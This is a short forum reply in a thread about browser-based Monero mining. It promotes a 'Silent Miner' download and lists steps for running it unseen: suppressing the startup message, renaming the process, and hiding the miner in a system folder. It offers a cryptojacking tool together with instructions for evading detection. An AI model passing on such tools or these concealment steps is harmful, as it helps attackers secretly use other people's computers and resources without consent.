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RE: Morion: Mine Monero online 30% faster than CoinHive!

u can try this one.. its working..
also has a video.. u can check it out.. it works for me

Silent mining including the new BTC, XMO, XMR and ETH etc

Support: [email protected]Channel: MinerGate:

Watch full video(YouTube):

1- Download Silent Miner VERSION
2- Extract files;
3- Generate INI file for configuration;
4- Off the Msg on Startup.. just click and start mining;
5- Change the .exe name from process;
6- Set the configuration parameters;
7- Choose any system folder to hide the miner;
8- Run the program again.

Download Silent Miner
Alternative Url 1:!ubYDFZAA!6QT6N-UO1IQSheDpqbriIn3N_veK3BTygRzDs8HzQcs